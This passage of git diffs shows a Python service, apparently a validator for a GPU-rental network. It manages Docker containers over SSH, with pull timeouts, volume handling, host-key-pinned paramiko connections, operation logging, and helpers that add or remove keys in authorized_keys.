+            **fields,
+        )
+        raise
+
+    log_rental_docker_sdk_operation(
+        operation=operation,
+        status="succeeded",
+        log_extra=log_extra,
+        duration_ms=int((time.monotonic() - start) * 1000),
+        **fields,
+    )
+    return result
+
+
+async def exec_logged_rental_docker_sdk_operation(
+    *,
+    docker_client: RentalDockerSdkClient,
+    operation: str,
+    exec_spec: ContainerExecSpec,
+    log_extra: dict,
+) -> ContainerExecResult:
+    start = time.monotonic()
+    fields = rental_exec_spec_log_fields(exec_spec)
+    log_rental_docker_sdk_operation(
+        operation=operation,
+        status="started",
+        log_extra=log_extra,
+        **fields,
+    )
+    try:
+        result = await docker_client.exec_in_container(exec_spec)
+    except Exception as exc:
+        log_rental_docker_sdk_operation(
+            operation=operation,
+            status="failed",
+            log_extra=log_extra,
+            level=logging.ERROR,
+            duration_ms=int((time.monotonic() - start) * 1000),
+            error=str(exc),
+            **fields,
+        )
+        raise
+
+    result_fields = {
+        **fields,
+        "duration_ms": int((time.monotonic() - start) * 1000),
+        **_exec_result_log_fields(result),
+    }
+    if result.exit_status == 0:
+        log_rental_docker_sdk_operation(
+            operation=operation,
+            status="succeeded",
+            log_extra=log_extra,
+            **result_fields,
+        )
+    else:
+        log_rental_docker_sdk_operation(
+            operation=operation,
+            status="failed",
+            log_extra=log_extra,
+            level=logging.WARNING,
+            **result_fields,
+        )
+
+    return result
+
+
+def rental_run_spec_log_fields(run_spec: ContainerRunSpec) -> dict:
+    return {
+        "container_name": run_spec.name,
+        "image": run_spec.image,
+        "command_argv": list(run_spec.command),
+        "environment_keys": sorted(run_spec.environment),
+        "ports": [
+            {
+                "container_port": port.container_port,
+                "host_port": port.host_port,
+                "protocol": port.protocol,
+            }
+            for port in run_spec.ports
+        ],
+        "volumes": [
+            {
+                "source": volume.source,
+                "target": volume.target,
+                "read_only": volume.read_only,
+            }
+            for volume in run_spec.volumes
+        ],
+        "restart_policy": run_spec.restart_policy,
+        "runtime": run_spec.runtime,
+        "cap_add": list(run_spec.cap_add),
+        "sysctls": run_spec.sysctls,
+        "device_mounts": [
+            {
+                "path_on_host": device.path_on_host,
+                "path_in_container": device.path_in_container,
+                "permissions": device.permissions,
+            }
+            for device in run_spec.devices
+        ],
+        "gpu_device_requests": [
+            {
+                "count": device_request.count,
+                "device_ids": list(device_request.device_ids),
+                "capabilities": [
+                    list(capability)
+                    for capability in device_request.capabilities
+                ],
+            }
+            for device_request in run_spec.device_requests
+        ],
+        "cpu_count": run_spec.cpu_count,
+        "memory_gb": run_spec.memory_gb,
+        "storage_limit_gb": run_spec.storage_limit_gb,
+        "shm_size": run_spec.shm_size,
+        "entrypoint": run_spec.entrypoint,
+    }
+
+
+def rental_exec_spec_log_fields(exec_spec: ContainerExecSpec) -> dict:
+    return {
+        "container_name": exec_spec.container_name,
+        "exec_argv": [_truncate_log_text(part) for part in exec_spec.argv],
+        "stdin_bytes": _stdin_size(exec_spec.stdin),
+        "environment_keys": sorted(exec_spec.environment),
+    }

--- a/neurons/validators/src/services/rental_docker_sdk.py
+++ b/neurons/validators/src/services/rental_docker_sdk.py
@@ -1,7 +1,6 @@
 from __future__ import annotations
 
 import asyncio
-import os
 import socket as socket_module
 import tempfile
 import threading
@@ -14,7 +13,7 @@ from datura.requests.miner_requests import ExecutorSSHInfo
 
 
 DEFAULT_DOCKER_PULL_TIMEOUT_SECONDS = 3 * 60 * 60
-_DOCKER_SDK_SSH_HOME_LOCK = threading.Lock()
+_DOCKER_SDK_SSH_ADAPTER_LOCK = threading.Lock()
 
 
 class RentalDockerConnectionError(RuntimeError):
@@ -380,27 +379,12 @@ class RentalDockerSdkClientFactory:
             known_hosts_path.chmod(0o600)
             _validate_paramiko_known_hosts(known_hosts_path)
 
-            config_path = ssh_dir / "config"
-            config_path.write_text(
-                "\n".join(
-                    [
-                        f"Host {executor_info.address}",
-                        f"    HostName {executor_info.address}",
-                        f"    Port {executor_info.ssh_port}",
-                        f"    User {executor_info.ssh_username}",
-                        f"    IdentityFile {key_path}",
-                        "    IdentitiesOnly yes",
-                        "",
-                    ]
-                )
-            )
-            config_path.chmod(0o600)
-
             try:
                 api_client = await asyncio.to_thread(
                     self._create_api_client,
                     _build_docker_ssh_base_url(executor_info),
-                    ssh_home,
+                    key_path,
+                    known_hosts_path,
                 )
             except Exception as exc:
                 raise RentalDockerConnectionError(
@@ -416,22 +400,27 @@ class RentalDockerSdkClientFactory:
             finally:
                 await client.aclose()
 
-    def _create_api_client(self, base_url: str, ssh_home: Path):
-        with _DOCKER_SDK_SSH_HOME_LOCK:
-            original_home = os.environ.get("HOME")
-            os.environ["HOME"] = str(ssh_home)
-            try:
-                factory = self.api_client_factory or _default_docker_api_client_factory
-                return factory(
+    def _create_api_client(
+        self,
+        base_url: str,
+        key_path: Path,
+        known_hosts_path: Path,
+    ):
+        with _DOCKER_SDK_SSH_ADAPTER_LOCK:
+            if self.api_client_factory is not None:
+                return self.api_client_factory(
                     base_url=base_url,
                     timeout=self.timeout,
                     use_ssh_client=False,
                 )
-            finally:
-                if original_home is None:
-                    os.environ.pop("HOME", None)
-                else:
-                    os.environ["HOME"] = original_home
+
+            return _default_docker_api_client_factory(
+                base_url=base_url,
+                timeout=self.timeout,
+                use_ssh_client=False,
+                key_path=key_path,
+                known_hosts_path=known_hosts_path,
+            )
 
 
 def build_container_command_argv(startup_commands: str | None) -> tuple[str, ...]:
@@ -541,7 +530,72 @@ def build_environment_exec_spec(
 def _default_docker_api_client_factory(**kwargs):
     import docker
 
+    key_path = kwargs.pop("key_path", None)
+    known_hosts_path = kwargs.pop("known_hosts_path", None)
+    if key_path is not None and known_hosts_path is not None:
+        return _create_docker_api_client_with_rental_ssh_adapter(
+            docker_module=docker,
+            key_path=key_path,
+            known_hosts_path=known_hosts_path,
+            **kwargs,
+        )
+
     return docker.APIClient(**kwargs)
+
+
+def _create_docker_api_client_with_rental_ssh_adapter(
+    *,
+    docker_module,
+    key_path: Path,
+    known_hosts_path: Path,
+    **kwargs,
+):
+    import docker.api.client as docker_api_client
+
+    # docker-py normally discovers SSH identity/known_hosts via ~/.ssh. Patch
+    # its adapter only during construction so this rental client uses our
+    # operation-scoped files without mutating process-global HOME.
+    original_adapter = docker_api_client.SSHHTTPAdapter
+    docker_api_client.SSHHTTPAdapter = _build_rental_ssh_http_adapter_class(
+        key_path=key_path,
+        known_hosts_path=known_hosts_path,
+    )
+    try:
+        return docker_module.APIClient(**kwargs)
+    finally:
+        docker_api_client.SSHHTTPAdapter = original_adapter
+
+
+def _build_rental_ssh_http_adapter_class(
+    *,
+    key_path: Path,
+    known_hosts_path: Path,
+):
+    from docker.transport.sshconn import SSHHTTPAdapter
+
+    class RentalSSHHTTPAdapter(SSHHTTPAdapter):
+        def _create_paramiko_client(self, base_url):
+            import logging
+            import urllib.parse
+
+            import paramiko
+
+            logging.getLogger("paramiko").setLevel(logging.WARNING)
+            parsed_base_url = urllib.parse.urlparse(base_url)
+            self.ssh_client = paramiko.SSHClient()
+            self.ssh_params = {
+                "hostname": parsed_base_url.hostname,
+                "port": parsed_base_url.port,
+                "username": parsed_base_url.username,
+                "key_filename": str(key_path),
+                "look_for_keys": False,
+                "allow_agent": False,
+            }
+            self.ssh_client.load_host_keys(str(known_hosts_path))
+            self.ssh_client.set_missing_host_key_policy(paramiko.RejectPolicy())
+
+    RentalSSHHTTPAdapter.__name__ = "RentalSSHHTTPAdapter"
+    return RentalSSHHTTPAdapter
 
 
 def _build_host_config_kwargs(spec: ContainerRunSpec) -> dict:

--- a/neurons/validators/src/services/rental_docker_sdk.py
+++ b/neurons/validators/src/services/rental_docker_sdk.py
@@ -6,13 +6,14 @@ import socket as socket_module
 import tempfile
 import threading
 from collections.abc import AsyncIterator, Callable
-from contextlib import asynccontextmanager
+from contextlib import asynccontextmanager, suppress
 from dataclasses import dataclass, field
 from pathlib import Path
 
 from datura.requests.miner_requests import ExecutorSSHInfo
 
 
+DEFAULT_DOCKER_PULL_TIMEOUT_SECONDS = 3 * 60 * 60
 _DOCKER_SDK_SSH_HOME_LOCK = threading.Lock()
 
 
@@ -95,8 +96,14 @@ class ContainerExecResult:
 
 
 class RentalDockerSdkClient:
-    def __init__(self, api_client):
+    def __init__(
+        self,
+        api_client,
+        *,
+        pull_timeout_seconds: int | float | None = DEFAULT_DOCKER_PULL_TIMEOUT_SECONDS,
+    ):
         self._api_client = api_client
+        self._pull_timeout_seconds = pull_timeout_seconds
 
     async def login(self, *, username: str, password: str) -> None:
         await self._call_api(
@@ -108,11 +115,26 @@ class RentalDockerSdkClient:
         )
 
     async def pull(self, *, image: str) -> None:
-        await self._call_api(
-            image,
-            operation_label="pull",
-            api_method=self._api_client.pull,
-        )
+        timeout_seconds = self._normalized_pull_timeout_seconds()
+        try:
+            pull_call = asyncio.to_thread(self._pull_sync, image)
+            if timeout_seconds is not None:
+                await asyncio.wait_for(
+                    pull_call,
+                    timeout=timeout_seconds,
+                )
+            else:
+                await pull_call
+        except asyncio.TimeoutError as exc:
+            with suppress(Exception):
+                await self.aclose()
+            raise RentalDockerOperationError(
+                f"Docker SDK pull timed out after {timeout_seconds} seconds"
+            ) from exc
+        except Exception as exc:
+            raise RentalDockerOperationError(
+                _wrap_error_message("Docker SDK pull failed", exc)
+            ) from exc
 
     async def image_exists(self, *, image: str) -> bool:
         try:
@@ -260,6 +282,32 @@ class RentalDockerSdkClient:
             if should_override_timeout:
                 self._api_client.timeout = original_timeout
 
+    def _pull_sync(self, image: str) -> None:
+        # docker.APIClient.pull() hardcodes timeout=None for /images/create.
+        # Call the same endpoint directly so rental image pulls keep the
+        # create_container timeout cap instead of waiting forever.
+        from docker import auth, utils
+
+        repository, image_tag = utils.parse_repository_tag(image)
+        tag = image_tag or "latest"
+        registry, _ = auth.resolve_repository_name(repository)
+        response = self._api_client._post(
+            self._api_client._url("/images/create"),
+            params={"tag": tag, "fromImage": repository},
+            headers=_build_pull_headers(self._api_client, registry),
+            stream=True,
+            timeout=self._normalized_pull_timeout_seconds(),
+        )
+        self._api_client._raise_for_status(response)
+
+        for event in self._api_client._stream_helper(response, decode=True) or ():
+            _raise_pull_event_error(event)
+
+    def _normalized_pull_timeout_seconds(self) -> int | float | None:
+        if self._pull_timeout_seconds is None or self._pull_timeout_seconds <= 0:
+            return None
+        return self._pull_timeout_seconds
+
     def _exec_in_container_sync(self, spec: ContainerExecSpec) -> ContainerExecResult:
         stdin_data = _encode_exec_stdin(spec.stdin)
         exec_create_result = self._api_client.exec_create(
@@ -289,6 +337,7 @@ class RentalDockerSdkClient:
 class RentalDockerSdkClientFactory:
     api_client_factory: Callable[..., object] | None = None
     timeout: int = 60
+    pull_timeout_seconds: int = DEFAULT_DOCKER_PULL_TIMEOUT_SECONDS
 
     @asynccontextmanager
     async def connect(
@@ -349,7 +398,10 @@ class RentalDockerSdkClientFactory:
                     _wrap_error_message("Docker SDK client construction failed", exc)
                 ) from exc
 
-            client = RentalDockerSdkClient(api_client)
+            client = RentalDockerSdkClient(
+                api_client,
+                pull_timeout_seconds=self.pull_timeout_seconds,
+            )
             try:
                 yield client
             finally:
@@ -649,6 +701,33 @@ def _decode_output_part(value) -> str:
     if isinstance(value, bytes):
         return value.decode(errors="replace")
     return str(value)
+
+
+def _build_pull_headers(api_client, registry: str) -> dict[str, str]:
+    auth_configs = getattr(api_client, "_auth_configs", None)
+    if not auth_configs or getattr(auth_configs, "is_empty", True):
+        return {}
+
+    from docker import auth
+
+    header = auth.get_config_header(api_client, registry)
+    return {"X-Registry-Auth": header} if header else {}
+
+
+def _raise_pull_event_error(event) -> None:
+    if not isinstance(event, dict):
+        return
+
+    message = event.get("error")
+    error_detail = event.get("errorDetail")
+    if not message and isinstance(error_detail, dict):
+        message = error_detail.get("message")
+    if not message:
+        return
+
+    from docker.errors import APIError
+
+    raise APIError("Docker image pull failed", explanation=str(message))
 
 
 def _is_docker_not_found_error(exc: Exception) -> bool:

--- a/neurons/validators/src/services/rental_docker_sdk.py
+++ b/neurons/validators/src/services/rental_docker_sdk.py
@@ -114,6 +114,17 @@ class RentalDockerSdkClient:
             api_method=self._api_client.pull,
         )
 
+    async def image_exists(self, *, image: str) -> bool:
+        try:
+            await asyncio.to_thread(self._api_client.inspect_image, image)
+        except Exception as exc:
+            if _is_docker_not_found_error(exc):
+                return False
+            raise RentalDockerOperationError(
+                _wrap_error_message("Docker SDK inspect image failed", exc)
+            ) from exc
+        return True
+
     async def run_container(self, spec: ContainerRunSpec) -> None:
         try:
             await asyncio.to_thread(self._run_container_sync, spec)
@@ -592,6 +603,13 @@ def _decode_output_part(value) -> str:
     if isinstance(value, bytes):
         return value.decode(errors="replace")
     return str(value)
+
+
+def _is_docker_not_found_error(exc: Exception) -> bool:
+    if exc.__class__.__name__ in {"ImageNotFound", "NotFound"}:
+        return True
+    response = getattr(exc, "response", None)
+    return getattr(response, "status_code", None) == 404
 
 
 def _build_docker_ssh_base_url(executor_info: ExecutorSSHInfo) -> str:

--- a/neurons/validators/src/services/rental_docker_sdk.py
+++ b/neurons/validators/src/services/rental_docker_sdk.py
@@ -170,6 +170,27 @@ class RentalDockerSdkClient:
             v=remove_volumes,
         )
 
+    async def create_volume(
+        self,
+        *,
+        volume_name: str,
+        driver: str | None = None,
+        driver_opts: dict[str, str] | None = None,
+        timeout: int | None = None,
+    ) -> None:
+        try:
+            await asyncio.to_thread(
+                self._create_volume_sync,
+                volume_name=volume_name,
+                driver=driver,
+                driver_opts=driver_opts,
+                timeout=timeout,
+            )
+        except Exception as exc:
+            raise RentalDockerOperationError(
+                _wrap_error_message("Docker SDK create volume failed", exc)
+            ) from exc
+
     async def remove_volume(self, *, volume_name: str, force: bool = False) -> None:
         await self._call_api(
             volume_name,
@@ -213,6 +234,31 @@ class RentalDockerSdkClient:
             host_config=host_config,
         )
         self._api_client.start(spec.name)
+
+    def _create_volume_sync(
+        self,
+        *,
+        volume_name: str,
+        driver: str | None,
+        driver_opts: dict[str, str] | None,
+        timeout: int | None,
+    ) -> None:
+        original_timeout = getattr(self._api_client, "timeout", None)
+        should_override_timeout = timeout is not None and hasattr(
+            self._api_client,
+            "timeout",
+        )
+        if should_override_timeout:
+            self._api_client.timeout = None if timeout == 0 else timeout
+        try:
+            self._api_client.create_volume(
+                name=volume_name,
+                driver=driver,
+                driver_opts=driver_opts,
+            )
+        finally:
+            if should_override_timeout:
+                self._api_client.timeout = original_timeout
 
     def _exec_in_container_sync(self, spec: ContainerExecSpec) -> ContainerExecResult:
         stdin_data = _encode_exec_stdin(spec.stdin)

--- a/neurons/validators/src/services/rental_docker_sdk.py
+++ b/neurons/validators/src/services/rental_docker_sdk.py
@@ -159,6 +159,20 @@ class RentalDockerSdkClient:
             v=remove_volumes,
         )
 
+    async def remove_volume(self, *, volume_name: str, force: bool = False) -> None:
+        await self._call_api(
+            volume_name,
+            operation_label="remove volume",
+            api_method=self._api_client.remove_volume,
+            force=force,
+        )
+
+    async def prune_images(self) -> None:
+        await self._call_api(
+            operation_label="prune images",
+            api_method=self._api_client.prune_images,
+        )
+
     async def aclose(self) -> None:
         close = getattr(self._api_client, "close", None)
         if close is not None:
@@ -350,6 +364,36 @@ def build_authorized_keys_exec_spec(
             f"mkdir -p {shlex.quote(target_path.rsplit('/', 1)[0])} "
             f"&& cat >> {shlex.quote(target_path)}",
         ),
+        stdin=key_data,
+    )
+
+
+def build_remove_authorized_keys_exec_spec(
+    *,
+    container_name: str,
+    public_keys: list[str] | tuple[str, ...],
+    target_path: str = "/root/.ssh/authorized_keys",
+) -> ContainerExecSpec:
+    import shlex
+
+    key_data = "".join(f"{public_key}\n" for public_key in public_keys)
+    quoted_dir = shlex.quote(target_path.rsplit("/", 1)[0])
+    quoted_path = shlex.quote(target_path)
+    script = (
+        "set -e; "
+        f"mkdir -p {quoted_dir} && "
+        f"touch {quoted_path} && "
+        "keys=$(mktemp) && filtered=$(mktemp) && "
+        "trap 'rm -f \"$keys\" \"$filtered\"' EXIT && "
+        "cat > \"$keys\" && "
+        f"if grep -vxF -f \"$keys\" {quoted_path} > \"$filtered\"; then "
+        ":; else status=$?; "
+        "[ \"$status\" -eq 1 ] || exit \"$status\"; fi; "
+        f"cat \"$filtered\" > {quoted_path}"
+    )
+    return ContainerExecSpec(
+        container_name=container_name,
+        argv=("sh", "-c", script),
         stdin=key_data,
     )
 

--- a/neurons/validators/src/services/rental_docker_sdk.py
+++ b/neurons/validators/src/services/rental_docker_sdk.py
@@ -379,6 +379,9 @@ def build_remove_authorized_keys_exec_spec(
     key_data = "".join(f"{public_key}\n" for public_key in public_keys)
     quoted_dir = shlex.quote(target_path.rsplit("/", 1)[0])
     quoted_path = shlex.quote(target_path)
+    # This shell runs inside the target container. Public keys are supplied via
+    # stdin and matched from a temp file, so key contents are never interpolated
+    # into host-side Docker shell text or into this argv.
     script = (
         "set -e; "
         f"mkdir -p {quoted_dir} && "

--- a/neurons/validators/src/services/rental_docker_sdk.py
+++ b/neurons/validators/src/services/rental_docker_sdk.py
@@ -25,6 +25,18 @@ class RentalDockerOperationError(RuntimeError):
     """Raised when Docker SDK reports a rental Docker operation failure."""
 
 
+def require_rental_docker_ssh_host_key(executor_info: ExecutorSSHInfo) -> str:
+    """Return the host key required by rental Docker SDK SSH connections."""
+    # ExecutorSSHInfo keeps this optional for non-connectable placeholder/error
+    # records; the rental Docker SDK path requires it to build known_hosts.
+    host_key = executor_info.ssh_host_key.strip() if executor_info.ssh_host_key else ""
+    if not host_key:
+        raise RentalDockerConnectionError(
+            "Executor is missing ssh_host_key; rental Docker operations require the executor SSH host public key"
+        )
+    return host_key
+
+
 @dataclass(slots=True)
 class PortBinding:
     container_port: int
@@ -346,10 +358,7 @@ class RentalDockerSdkClientFactory:
         executor_info: ExecutorSSHInfo,
         private_key: str,
     ) -> AsyncIterator[RentalDockerSdkClient]:
-        if not executor_info.ssh_host_key or not executor_info.ssh_host_key.strip():
-            raise RentalDockerConnectionError(
-                "Executor SSH host key is required for Docker SDK SSH access"
-            )
+        host_key = require_rental_docker_ssh_host_key(executor_info)
 
         with tempfile.TemporaryDirectory(prefix="lium-rental-docker-ssh-") as temp_dir:
             ssh_home = Path(temp_dir)
@@ -365,7 +374,7 @@ class RentalDockerSdkClientFactory:
                 _build_known_hosts_text(
                     host=executor_info.address,
                     port=executor_info.ssh_port,
-                    host_key=executor_info.ssh_host_key,
+                    host_key=host_key,
                 )
             )
             known_hosts_path.chmod(0o600)

--- a/neurons/validators/src/services/rental_docker_sdk.py
+++ b/neurons/validators/src/services/rental_docker_sdk.py
@@ -1,0 +1,580 @@
+from __future__ import annotations
+
+import asyncio
+import os
+import socket as socket_module
+import tempfile
+import threading
+from collections.abc import AsyncIterator, Callable
+from contextlib import asynccontextmanager
+from dataclasses import dataclass, field
+from pathlib import Path
+
+from datura.requests.miner_requests import ExecutorSSHInfo
+
+
+_DOCKER_SDK_SSH_HOME_LOCK = threading.Lock()
+
+
+class RentalDockerConnectionError(RuntimeError):
+    """Raised when Docker SDK over SSH cannot be constructed safely."""
+
+
+class RentalDockerOperationError(RuntimeError):
+    """Raised when Docker SDK reports a rental Docker operation failure."""
+
+
+@dataclass(slots=True)
+class PortBinding:
+    container_port: int
+    host_port: int
+    protocol: str = "tcp"
+
+
+@dataclass(slots=True)
+class VolumeMount:
+    source: str
+    target: str
+    read_only: bool = False
+
+
+@dataclass(slots=True)
+class DeviceMount:
+    path_on_host: str
+    path_in_container: str | None = None
+    permissions: str = "rwm"
+
+
+@dataclass(slots=True)
+class GpuDeviceRequest:
+    count: int | None = None
+    device_ids: tuple[str, ...] = ()
+    capabilities: tuple[tuple[str, ...], ...] = (("gpu",),)
+
+
+@dataclass(slots=True)
+class GpuDockerConfig:
+    device_requests: tuple[GpuDeviceRequest, ...] = ()
+    device_mounts: tuple[DeviceMount, ...] = ()
+
+
+@dataclass(slots=True)
+class ContainerRunSpec:
+    image: str
+    name: str
+    command: tuple[str, ...] = ()
+    environment: dict[str, str] = field(default_factory=dict)
+    ports: tuple[PortBinding, ...] = ()
+    volumes: tuple[VolumeMount, ...] = ()
+    restart_policy: str | None = "unless-stopped"
+    runtime: str | None = None
+    cap_add: tuple[str, ...] = ()
+    sysctls: dict[str, str] = field(default_factory=dict)
+    devices: tuple[DeviceMount, ...] = ()
+    device_requests: tuple[GpuDeviceRequest, ...] = ()
+    cpu_count: int | None = None
+    memory_gb: int | None = None
+    storage_limit_gb: int | None = None
+    shm_size: str | None = None
+    entrypoint: str | None = None
+
+
+@dataclass(slots=True)
+class ContainerExecSpec:
+    container_name: str
+    argv: tuple[str, ...]
+    stdin: str | bytes | None = None
+    environment: dict[str, str] = field(default_factory=dict)
+
+
+@dataclass(slots=True)
+class ContainerExecResult:
+    exit_status: int
+    stdout: str = ""
+    stderr: str = ""
+
+
+class RentalDockerSdkClient:
+    def __init__(self, api_client):
+        self._api_client = api_client
+
+    async def login(self, *, username: str, password: str) -> None:
+        await self._call_api(
+            operation_label="login",
+            api_method=self._api_client.login,
+            username=username,
+            password=password,
+            reauth=True,
+        )
+
+    async def pull(self, *, image: str) -> None:
+        await self._call_api(
+            image,
+            operation_label="pull",
+            api_method=self._api_client.pull,
+        )
+
+    async def run_container(self, spec: ContainerRunSpec) -> None:
+        try:
+            await asyncio.to_thread(self._run_container_sync, spec)
+        except Exception as exc:
+            raise RentalDockerOperationError(
+                _wrap_error_message("Docker SDK run container failed", exc)
+            ) from exc
+
+    async def exec_in_container(self, spec: ContainerExecSpec) -> ContainerExecResult:
+        try:
+            return await asyncio.to_thread(self._exec_in_container_sync, spec)
+        except Exception as exc:
+            raise RentalDockerOperationError(
+                _wrap_error_message("Docker SDK exec failed", exc)
+            ) from exc
+
+    async def start(self, *, container_name: str) -> None:
+        await self._call_api(
+            container_name,
+            operation_label="start",
+            api_method=self._api_client.start,
+        )
+
+    async def stop(self, *, container_name: str) -> None:
+        await self._call_api(
+            container_name,
+            operation_label="stop",
+            api_method=self._api_client.stop,
+        )
+
+    async def remove_container(
+        self,
+        *,
+        container_name: str,
+        force: bool = True,
+        remove_volumes: bool = True,
+    ) -> None:
+        await self._call_api(
+            container_name,
+            operation_label="remove container",
+            api_method=self._api_client.remove_container,
+            force=force,
+            v=remove_volumes,
+        )
+
+    async def aclose(self) -> None:
+        close = getattr(self._api_client, "close", None)
+        if close is not None:
+            await asyncio.to_thread(close)
+
+    async def _call_api(self, *args, operation_label: str, api_method, **kwargs) -> None:
+        try:
+            await asyncio.to_thread(api_method, *args, **kwargs)
+        except Exception as exc:
+            raise RentalDockerOperationError(
+                _wrap_error_message(f"Docker SDK {operation_label} failed", exc)
+            ) from exc
+
+    def _run_container_sync(self, spec: ContainerRunSpec) -> None:
+        host_config = self._api_client.create_host_config(
+            **_build_host_config_kwargs(spec)
+        )
+        self._api_client.create_container(
+            image=spec.image,
+            command=list(spec.command) or None,
+            detach=True,
+            ports=_container_ports(spec.ports) or None,
+            environment=spec.environment or None,
+            volumes=_container_volumes(spec.volumes) or None,
+            name=spec.name,
+            entrypoint=spec.entrypoint or None,
+            host_config=host_config,
+        )
+        self._api_client.start(spec.name)
+
+    def _exec_in_container_sync(self, spec: ContainerExecSpec) -> ContainerExecResult:
+        stdin_data = _encode_exec_stdin(spec.stdin)
+        exec_create_result = self._api_client.exec_create(
+            container=spec.container_name,
+            cmd=list(spec.argv),
+            stdin=stdin_data is not None,
+            environment=spec.environment or None,
+        )
+        exec_id = exec_create_result["Id"]
+
+        if stdin_data is None:
+            output = self._api_client.exec_start(exec_id, demux=True)
+        else:
+            exec_socket = self._api_client.exec_start(exec_id, socket=True)
+            output = _write_stdin_and_read_exec_output(exec_socket, stdin_data)
+
+        inspect_result = self._api_client.exec_inspect(exec_id)
+        stdout, stderr = _decode_exec_output(output)
+        return ContainerExecResult(
+            exit_status=int(inspect_result.get("ExitCode") or 0),
+            stdout=stdout,
+            stderr=stderr,
+        )
+
+
+@dataclass(slots=True)
+class RentalDockerSdkClientFactory:
+    api_client_factory: Callable[..., object] | None = None
+    timeout: int = 60
+
+    @asynccontextmanager
+    async def connect(
+        self,
+        *,
+        executor_info: ExecutorSSHInfo,
+        private_key: str,
+    ) -> AsyncIterator[RentalDockerSdkClient]:
+        if not executor_info.ssh_host_key or not executor_info.ssh_host_key.strip():
+            raise RentalDockerConnectionError(
+                "Executor SSH host key is required for Docker SDK SSH access"
+            )
+
+        with tempfile.TemporaryDirectory(prefix="lium-rental-docker-ssh-") as temp_dir:
+            ssh_home = Path(temp_dir)
+            ssh_dir = ssh_home / ".ssh"
+            ssh_dir.mkdir(mode=0o700)
+
+            key_path = ssh_dir / "id_executor"
+            key_path.write_text(private_key)
+            key_path.chmod(0o600)
+
+            known_hosts_path = ssh_dir / "known_hosts"
+            known_hosts_path.write_text(
+                _build_known_hosts_text(
+                    host=executor_info.address,
+                    port=executor_info.ssh_port,
+                    host_key=executor_info.ssh_host_key,
+                )
+            )
+            known_hosts_path.chmod(0o600)
+            _validate_paramiko_known_hosts(known_hosts_path)
+
+            config_path = ssh_dir / "config"
+            config_path.write_text(
+                "\n".join(
+                    [
+                        f"Host {executor_info.address}",
+                        f"    HostName {executor_info.address}",
+                        f"    Port {executor_info.ssh_port}",
+                        f"    User {executor_info.ssh_username}",
+                        f"    IdentityFile {key_path}",
+                        "    IdentitiesOnly yes",
+                        "",
+                    ]
+                )
+            )
+            config_path.chmod(0o600)
+
+            try:
+                api_client = await asyncio.to_thread(
+                    self._create_api_client,
+                    _build_docker_ssh_base_url(executor_info),
+                    ssh_home,
+                )
+            except Exception as exc:
+                raise RentalDockerConnectionError(
+                    _wrap_error_message("Docker SDK client construction failed", exc)
+                ) from exc
+
+            client = RentalDockerSdkClient(api_client)
+            try:
+                yield client
+            finally:
+                await client.aclose()
+
+    def _create_api_client(self, base_url: str, ssh_home: Path):
+        with _DOCKER_SDK_SSH_HOME_LOCK:
+            original_home = os.environ.get("HOME")
+            os.environ["HOME"] = str(ssh_home)
+            try:
+                factory = self.api_client_factory or _default_docker_api_client_factory
+                return factory(
+                    base_url=base_url,
+                    timeout=self.timeout,
+                    use_ssh_client=False,
+                )
+            finally:
+                if original_home is None:
+                    os.environ.pop("HOME", None)
+                else:
+                    os.environ["HOME"] = original_home
+
+
+def build_container_command_argv(startup_commands: str | None) -> tuple[str, ...]:
+    if not startup_commands or not startup_commands.strip():
+        return ()
+    import shlex
+
+    try:
+        return tuple(shlex.split(startup_commands))
+    except ValueError:
+        return ()
+
+
+def build_gpu_docker_config(
+    gpu_uuids: tuple[str, ...] | list[str] | None,
+    *,
+    device_nodes: tuple[str, ...] | list[str] = (),
+) -> GpuDockerConfig:
+    requested_uuids = tuple(gpu_uuids or ())
+    device_request = (
+        GpuDeviceRequest(device_ids=requested_uuids)
+        if requested_uuids
+        else GpuDeviceRequest(count=-1)
+    )
+    return GpuDockerConfig(
+        device_requests=(device_request,),
+        device_mounts=tuple(
+            DeviceMount(path_on_host=node, path_in_container=node)
+            for node in device_nodes
+        ),
+    )
+
+
+def build_authorized_keys_exec_spec(
+    *,
+    container_name: str,
+    public_keys: list[str] | tuple[str, ...],
+    target_path: str = "/root/.ssh/authorized_keys",
+) -> ContainerExecSpec:
+    import shlex
+
+    key_data = "".join(f"{public_key}\n" for public_key in public_keys)
+    return ContainerExecSpec(
+        container_name=container_name,
+        argv=(
+            "sh",
+            "-c",
+            f"mkdir -p {shlex.quote(target_path.rsplit('/', 1)[0])} "
+            f"&& cat >> {shlex.quote(target_path)}",
+        ),
+        stdin=key_data,
+    )
+
+
+def build_environment_exec_spec(
+    *,
+    container_name: str,
+    environment: dict[str, str] | None,
+) -> ContainerExecSpec | None:
+    env_lines = [
+        f"{key}={value}"
+        for key, value in (environment or {}).items()
+        if key and value and key.strip() and str(value).strip()
+    ]
+    if not env_lines:
+        return None
+    return ContainerExecSpec(
+        container_name=container_name,
+        argv=("sh", "-c", "cat >> /etc/environment"),
+        stdin="".join(f"{line}\n" for line in env_lines),
+    )
+
+
+def _default_docker_api_client_factory(**kwargs):
+    import docker
+
+    return docker.APIClient(**kwargs)
+
+
+def _build_host_config_kwargs(spec: ContainerRunSpec) -> dict:
+    kwargs = {
+        "port_bindings": _port_bindings(spec.ports),
+        "binds": _binds(spec.volumes),
+        "restart_policy": _restart_policy(spec.restart_policy),
+        "runtime": spec.runtime,
+        "cap_add": list(spec.cap_add) or None,
+        "sysctls": spec.sysctls or None,
+        "devices": _devices(spec.devices),
+        "device_requests": _device_requests(spec.device_requests),
+        "nano_cpus": spec.cpu_count * 1_000_000_000 if spec.cpu_count else None,
+        "mem_limit": f"{spec.memory_gb}g" if spec.memory_gb else None,
+        "storage_opt": (
+            {"size": f"{spec.storage_limit_gb}g"}
+            if spec.storage_limit_gb
+            else None
+        ),
+        "shm_size": spec.shm_size,
+    }
+    return {key: value for key, value in kwargs.items() if value is not None}
+
+
+def _container_ports(ports: tuple[PortBinding, ...]) -> list[str]:
+    return [_port_key(port) for port in ports]
+
+
+def _port_bindings(ports: tuple[PortBinding, ...]) -> dict[str, int]:
+    return {_port_key(port): port.host_port for port in ports}
+
+
+def _port_key(port: PortBinding) -> str:
+    return f"{port.container_port}/{port.protocol}"
+
+
+def _container_volumes(volumes: tuple[VolumeMount, ...]) -> list[str]:
+    return [volume.target for volume in volumes]
+
+
+def _binds(volumes: tuple[VolumeMount, ...]) -> list[str]:
+    return [
+        f"{volume.source}:{volume.target}:{'ro' if volume.read_only else 'rw'}"
+        for volume in volumes
+    ]
+
+
+def _restart_policy(policy: str | None) -> dict[str, str] | None:
+    if not policy:
+        return None
+    return {"Name": policy}
+
+
+def _devices(devices: tuple[DeviceMount, ...]) -> list[str]:
+    return [_device_arg(device) for device in devices]
+
+
